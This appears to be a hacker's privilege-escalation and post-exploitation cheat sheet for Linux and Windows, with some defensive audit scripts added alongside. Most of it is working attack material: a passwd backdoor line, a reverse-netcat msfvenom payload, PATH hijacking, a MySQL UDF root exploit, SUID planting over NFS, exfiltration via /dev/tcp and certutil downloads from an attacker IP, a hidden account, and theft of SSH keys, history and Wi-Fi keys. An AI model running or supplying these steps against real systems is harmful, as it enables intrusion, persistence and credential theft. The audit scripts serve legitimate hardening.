What to do once you're on the Box¶
Linux¶
`sudo -l` lists what the user is allowed to execute with sudo; entries marked `NOPASSWD` run without entering a password. Also keep an eye on the environment variables that are inherited (`env_keep` info).
Check if DLL loading is possible.
`find / -type f -a \( -perm -u+s -o -perm -g+s \) -ls 2>/dev/null` finds SUID and SGID files.
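As an added example, not code from the original notes: a small POSIX shell script that parses text in the layout `sudo -l` prints and reports the two things the paragraph above says to look at, rules marked `NOPASSWD` and variables preserved through `env_keep`. The function names (`sudo_l_findings`, `sudo_l_nopasswd_count`, `sample_sudo_l`) and the sample output are constructed for this example; it assumes only sh and awk.

```shell
#!/bin/sh
# Added audit example, not code from the original notes: parses text in
# the layout that `sudo -l` prints and reports rules marked NOPASSWD and
# variables kept through env_keep.  Assumes POSIX sh and awk; the sample
# output below is constructed, not taken from a real host.
# Usage: sudo -l 2>/dev/null | sh sudo_l_audit.sh   (or: sh sudo_l_audit.sh saved.txt)

# Print one finding per line: "env_keep VAR" or "nopasswd (runas) command".
# Reads the file given as $1, or stdin when no argument is passed.
sudo_l_findings() {
    awk '
        # Defaults line: pull the env_keep value, whether quoted or bare.
        match($0, /env_keep[+]?=("[^"]*"|[^, ]+)/) {
            v = substr($0, RSTART, RLENGTH)
            sub(/^env_keep[+]?=/, "", v)
            gsub(/"/, "", v)
            n = split(v, words, " ")
            for (i = 1; i <= n; i++) print "env_keep " words[i]
        }
        # Rule line: "(runas) NOPASSWD: command[, command ...]".
        /NOPASSWD:/ {
            line = $0
            sub(/^[[:space:]]+/, "", line)
            split(line, parts, /NOPASSWD:[[:space:]]*/)
            runas = parts[1]
            sub(/[[:space:]]+$/, "", runas)
            print "nopasswd " runas " " parts[2]
        }
    ' "${1:--}"
}

# Number of NOPASSWD rules in the input, handy for a quick pass/fail check.
sudo_l_nopasswd_count() {
    sudo_l_findings "$@" | grep -c '^nopasswd '
}

# Constructed sample of `sudo -l` output (not from a real host).
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for alice on box:
    env_reset, mail_badpass, env_keep+="EDITOR PAGER",
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on box:
    (root) NOPASSWD: /usr/bin/vi
    (ALL : ALL) /usr/bin/apt-get update
EOF
}

# Run with --demo to see the findings for the constructed sample.
if [ "${1:-}" = --demo ]; then sample_sudo_l | sudo_l_findings; fi
```

On the sample above the script prints `env_keep EDITOR`, `env_keep PAGER` and `nopasswd (root) /usr/bin/vi`; the `(ALL : ALL)` rule is not reported because it still asks for a password.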
Run `curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh` to get the full information about the box, including files you're allowed to execute that have the setuid flag set, and your sudo permissions.
You can also run another script, `wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh; chmod 700 lse.sh`, which is also very good!
You can also run `wget https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh; sh ./LinEnum.sh`, which is an alternative to linPEAS.
To switch between users, once you have the credentials, you can use `su <username>` and enter the password.
Take a thorough look at which files/services can be executed as root from the current user and check with https://gtfobins.github.io/ how they can be exploited.
Here are the easiest ones.
Cookbooks for Privilege Escalations:
* https://tryhackme.com/room/linuxprivesc
* https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
* PayloadsAllTheThings - Methodology and Resources/Linux - Privilege Escalation.md
* https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
* https://payatu.com/guide-linux-privilege-escalation
Writable /etc/passwd and /etc/shadow file¶
In case `/etc/passwd` is writable we can add another line to it, adding a new user with UID 0 (root).
In case `/etc/shadow` is writable you can replace password hashes.
The password hash is always between the first two colons, like `<username>:<passwordhash>:<otherthings>`.
There are several ways to generate a new hash.
OpenSSL
```bash
openssl passwd -1 -salt <somesalt> <newpassword>
# -1 = optional, selects the MD5-based crypt format
# -salt = optional, sets the salt, so precomputed (rainbow table) lookups don't apply
```
mkpasswd
```bash
mkpasswd -m sha-512 <newpassword>
```
Add a new user to /etc/passwd
```bash
# single quotes keep the shell from expanding the $ characters inside the hash
echo '<username>:<passwordhash>:0:0:<optional comment>:/root:/bin/bash' >> /etc/passwd
```
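As an added example, not code from the original notes: an audit script for the conditions this section relies on. It reports a group- or world-writable passwd/shadow file, extra UID 0 accounts, passwd entries carrying a hash (or nothing) instead of the `x` marker, and shadow entries with an empty hash. Function names (`write_state`, `extra_root_accounts`, `nonstandard_password_fields`, `empty_shadow_hashes`, `audit_passwd_shadow`, `make_sample_files`) and the sample files are constructed for this example; it assumes POSIX sh, awk and ls.

```shell
#!/bin/sh
# Added audit example, not code from the original notes: checks passwd- and
# shadow-style files for the conditions the section above relies on.
# Assumes POSIX sh, awk and ls; the sample data below is constructed.
# Usage: sh passwd_audit.sh /etc/passwd /etc/shadow

# "writable" if the ls -l mode string has the group (column 6) or other
# (column 9) write bit set, otherwise "ok".
write_state() {
    m=$(ls -ld "$1" 2>/dev/null | cut -c6,9)
    case "$m" in
        *w*) echo writable ;;
        *)   echo ok ;;
    esac
}

# Accounts with UID 0 other than root.  Field layout:
# name:password:uid:gid:gecos:home:shell
extra_root_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts whose passwd password field is not "x" (hash lives in shadow) or
# a lock marker ("*", "!", "!!"); an inline hash or an empty field both
# count, the former being what the echo one-liner above produces.
nonstandard_password_fields() {
    awk -F: '$2 !~ /^(x|\*|!+)$/ { print $1 }' "$1"
}

# Accounts in a shadow-style file whose hash field is empty.
empty_shadow_hashes() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Full report, one finding per line; returns 0 when nothing was found.
audit_passwd_shadow() {
    found=0
    for f in "$1" "$2"; do
        [ -e "$f" ] || continue
        if [ "$(write_state "$f")" = writable ]; then
            echo "writable $f"; found=1
        fi
    done
    for u in $(extra_root_accounts "$1"); do echo "uid0 $u"; found=1; done
    for u in $(nonstandard_password_fields "$1"); do echo "inline-hash $u"; found=1; done
    if [ -r "$2" ]; then
        for u in $(empty_shadow_hashes "$2"); do echo "empty-hash $u"; found=1; done
    fi
    return $found
}

# Constructed sample files in a temp dir so the audit runs offline;
# "backdoor" models the appended passwd line from the section above and
# the hash strings are placeholders, not real hashes.
make_sample_files() {
    d=$(mktemp -d)
    cat > "$d/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backdoor:$1$xyz$CONSTRUCTEDHASHVALUE0000:0:0::/root:/bin/bash
EOF
    cat > "$d/shadow" <<'EOF'
root:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:19000:0:99999:7:::
alice::19000:0:99999:7:::
EOF
    chmod 666 "$d/passwd"
    chmod 640 "$d/shadow"
    echo "$d"
}

if [ $# -ge 2 ]; then audit_passwd_shadow "$1" "$2"; fi
```

Against the constructed sample the report lists the writable passwd file, `uid0 backdoor`, `inline-hash backdoor` and `empty-hash alice`, and the script exits non-zero so it can sit in a cron job or CI check.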
Escaping Vi Editor¶
If `vi` is listed in the `sudo -l` output, you can simply run `sudo vi` and then `:!sh` to get a root shell through the editor.
Exploiting crontab¶
Run `cat /etc/crontab` to see scheduled tasks; maybe one of them is exploitable.
Take a look at the environment variables defined in the crontab file, especially `PATH`: you could mislead cron by placing scripts where its `PATH` points.
In case a script is executed you can create a payload for a bind/reverse shell with `msfvenom -p cmd/unix/reverse_netcat lhost=<local/remote ip> lport=8888 R`. Don't forget to listen for it with `nc -lvnp 8888`.
Exploiting PATH environment variable¶
The PATH environment variable, defined as `/path1:/path2:/path3`, holds all paths in which an executable is searched for. Unlike on Windows, the current directory is not searched unless PATH contains a `.` element.
To exploit the PATH we need a SUID executable which calls another executable without path information. Use `strings <executable>` to get a hint whether an executable name occurs, or execute the executable and check with `ps`/`top` if a sub-executable is called at a certain time.
The next step is to create a bash script with the name of the called executable containing a bind/reverse shell or simply just `/bin/bash`. Maybe it's required to extend the PATH variable with `export PATH=/new/path:$PATH`.
```bash
cd /tmp
echo "/bin/bash" > ls
chmod +x ls
export PATH=/tmp:$PATH
# execute the SUID file now
```
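As an added example serving both the crontab section and this PATH section, and not code from the original notes: an audit script that walks a PATH-style string (the shell's own or the `PATH=` line of a system crontab) and flags `.`/empty elements, relative or missing entries and group/world-writable directories, and that reports cron jobs whose program file is writable by non-owners. The function names (`write_state`, `path_findings`, `crontab_path_findings`, `crontab_writable_commands`, `make_sample_crontab`) and the sample crontab are constructed for this example; it assumes POSIX sh, awk, sed and ls.

```shell
#!/bin/sh
# Added audit example, not code from the original notes: checks the
# conditions the crontab and PATH sections above depend on, "." or a
# writable directory in a PATH (the shell's or one set in a system crontab)
# and cron jobs whose program file is writable by others.
# Assumes POSIX sh, awk, sed and ls; the sample crontab is constructed.
# Usage: sh path_audit.sh /etc/crontab      (or: path_findings "$PATH")

# "writable" if the ls -l mode string has the group (column 6) or other
# (column 9) write bit set, otherwise "ok".
write_state() {
    m=$(ls -ld "$1" 2>/dev/null | cut -c6,9)
    case "$m" in
        *w*) echo writable ;;
        *)   echo ok ;;
    esac
}

# Walk a PATH-style string and print one finding per line as "<kind> <entry>".
# Kinds: current-dir (empty element or "."), relative, missing, writable.
path_findings() {
    printf '%s\n' "$1" | awk -F: '{ for (i = 1; i <= NF; i++) print $i }' |
    while IFS= read -r entry; do
        case "$entry" in
            ''|.) echo "current-dir ${entry:-(empty)}" ;;
            /*)
                if [ ! -d "$entry" ]; then
                    echo "missing $entry"
                elif [ "$(write_state "$entry")" = writable ]; then
                    echo "writable $entry"
                fi ;;
            *) echo "relative $entry" ;;
        esac
    done
}

# Audit the PATH= line of a system crontab (first match, quotes stripped).
crontab_path_findings() {
    p=$(sed -n 's/^[[:space:]]*PATH[[:space:]]*=//p' "$1" | head -n 1 |
        sed -e 's/^"//' -e 's/"$//')
    if [ -n "$p" ]; then path_findings "$p"; fi
}

# For each job line (min hour dom mon dow user command ...) print
# "writable <program>" when the program is an absolute path with the group
# or other write bit set.  @reboot-style lines are skipped.
crontab_writable_commands() {
    awk 'NF >= 7 && $1 !~ /^#/ && $1 !~ /=/ { print $7 }' "$1" |
    while IFS= read -r prog; do
        case "$prog" in
            /*) if [ -f "$prog" ] && [ "$(write_state "$prog")" = writable ]; then
                    echo "writable $prog"
                fi ;;
        esac
    done
}

# Constructed sample in a temp dir so the audit runs offline: a world-
# writable directory in cron's PATH, "." at its end, and a job whose script
# anyone can edit.
make_sample_crontab() {
    d=$(mktemp -d)
    mkdir "$d/loosedir"
    chmod 777 "$d/loosedir"
    printf '#!/bin/sh\necho backup done\n' > "$d/backup.sh"
    chmod 777 "$d/backup.sh"
    cat > "$d/crontab" <<EOF
# constructed sample, not a real /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/bin:/usr/bin:/bin:$d/loosedir:.
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    $d/backup.sh
EOF
    echo "$d"
}

if [ $# -ge 1 ]; then crontab_path_findings "$1"; crontab_writable_commands "$1"; fi
```

On the constructed crontab the output contains `writable <tmpdir>/loosedir`, `current-dir .` and `writable <tmpdir>/backup.sh`; run `path_findings "$PATH"` in an interactive shell to apply the same check to your own search path.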
MySql Server¶
In case the MySQL server is accessible and runs as root, we can load a user-defined function (UDF) library that gives us root rights: https://www.exploit-db.com/exploits/1518
```bash
cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root
```
```sql
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
exit
```
```bash
/tmp/rootbash -p
```
Upload SUID files via NFS¶
In case the victim server has network shares open (`nmap -p 135,445 --script=smb-enum-shares.nse,smb-enum-users.nse $IP` enumerates SMB shares; NFS exports are listed in `/etc/exports`), you can try to create a file with the SUID bit set on this share from the attacker server and execute it on the victim server.
Try to read the `/etc/exports` file, which contains the setting flags for each share.
The `no_root_squash` flag means that files uploaded via the share retain their SUID bit as root; otherwise the server maps root to `nobody`, so the uploaded file is owned by `nobody` and its SUID bit gives nothing.
```bash
# attacker box
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/share /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell
chmod +xs /tmp/nfs/shell
# victim box
/tmp/shell
```
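As an added example, not code from the original notes or from nfs-utils: an audit script that reads an `/etc/exports`-style file and reports exports with `no_root_squash`, the `insecure` option or a `*` client wildcard, and lists SUID/SGID files under an exported directory, which is where an upload like the one above would show up. The function names (`exports_findings`, `suid_files_under`, `make_sample_exports`) and the sample exports file are constructed for this example; it assumes POSIX sh, awk and find.

```shell
#!/bin/sh
# Added audit example, not code from the original notes: reads an
# /etc/exports-style file and reports the option the section above turns on
# (no_root_squash) plus two others worth a look (insecure, "*" clients),
# and lists SUID/SGID files sitting in an exported directory.
# Assumes POSIX sh, awk and find; the sample exports file is constructed.
# Usage: sh exports_audit.sh /etc/exports ; suid_files_under /srv/share

# One finding per line: "<kind> <export-path> <client>".
exports_findings() {
    awk '
        NF == 0 || $1 ~ /^#/ { next }
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                host = $i; opts = ""
                if (split($i, parts, "(") > 1) {
                    host = parts[1]; opts = parts[2]; sub(/\)$/, "", opts)
                }
                n = split(opts, o, ",")
                squash = "root_squash"            # exportfs default
                for (j = 1; j <= n; j++) {
                    if (o[j] == "no_root_squash") squash = o[j]
                    if (o[j] == "insecure") print "insecure " path " " host
                }
                if (squash == "no_root_squash") print "no_root_squash " path " " host
                if (host == "*") print "wildcard-client " path " " host
            }
        }' "$1"
}

# SUID/SGID regular files below a directory (e.g. the exported path), one
# per line, without crossing into other filesystems.
suid_files_under() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Constructed sample in a temp dir so the audit runs offline: an exports
# file with one risky line per kind, and a share directory holding one
# SUID marker script next to a plain file.
make_sample_exports() {
    d=$(mktemp -d)
    cat > "$d/exports" <<'EOF'
# constructed sample, not a live server
/srv/public   *(ro,sync,no_subtree_check)
/srv/backup   10.10.10.0/24(rw,sync,no_root_squash,no_subtree_check)
/srv/dev      *(rw,insecure,no_root_squash)
EOF
    mkdir "$d/share"
    printf '#!/bin/sh\nid\n' > "$d/share/shell"
    chmod 4755 "$d/share/shell"
    printf 'plain file\n' > "$d/share/notes.txt"
    echo "$d"
}

if [ $# -ge 1 ]; then exports_findings "$1"; fi
```

On the constructed file the audit prints five lines, two of them `no_root_squash`; `suid_files_under` on the sample share returns only the marker script. A clean export line such as `/srv/public 10.10.10.0/24(ro,sync,no_subtree_check)` produces no output at all.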
Kernel Exploits¶
Kernel exploits are one of the last resorts to get higher privileges because they can bring the target server into an unstable state.
Linux Exploit Suggester¶
https://github.com/mzet-/linux-exploit-suggester
```bash
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
chmod +x les.sh
./les.sh
```
Each found exploit has a level which indicates how likely the attempt is to succeed:
* Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.
* Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
* Less probable - additional manual analysis is needed to verify if kernel is affected.
* Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
Linux Exploit Suggester 2¶
https://github.com/jondonas/linux-exploit-suggester-2
```bash
wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl -O les2.pl
perl les2.pl
```
Send files: VICTIM -> ATTACKER¶
on attacker: `nc -lvnp $PORT > /file_to_save`
on victim: `cat $FILE > /dev/tcp/$HOSTIP/$PORT` (`/dev/tcp` is a bash feature, so run this from bash, not sh)
Windows¶
- https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS
- RAW: https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat
- CrackMapExec
```cmd
certutil.exe -urlcache -split -f "http://10.8.220.86:4000/winPEAS.bat" wp.bat
```
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
- RAW: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
```powershell
certutil.exe -urlcache -split -f "http://10.8.220.86:4000/PowerUp.ps1" pu.ps1
. ./pu.ps1
Invoke-AllChecks
```
- Check if you can escalate with Priv2Admin
- See if you can create a hidden system account with CreateHiddenAccount
Kernel Exploits¶
Windows Exploit Suggester - Next Generation
Post Exploitation¶
Windows¶
Migrate to another process:
* `ps` to get processes that are stable (e.g. explorer)
* `psinject <Listener> <ProcessID>` with the process ID and listener
Get the Windows build number:
```powershell
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ReleaseId
```
If the build is older than Win10 2004, try `powershell/privesc/printdemon` (CVE-2020-1048) with the base64 part of the stager and `shell restart-computer -force` for higher privilege.
Get the Loot¶
Linux¶
Get the ssh key!¶
```bash
cat ~/.ssh/id_rsa
cat /root/.ssh/id_rsa
```
Get the history of a user¶
```bash
cat ~/.*history | less
```
Get config files¶
Search the user's home directory with `ls -la` and see if you can find configuration directories and files!
Windows¶
Get wlan/wifi passwords on a windows machine (no admin priv needed)¶
```cmd
netsh wlan export profile key=clear
```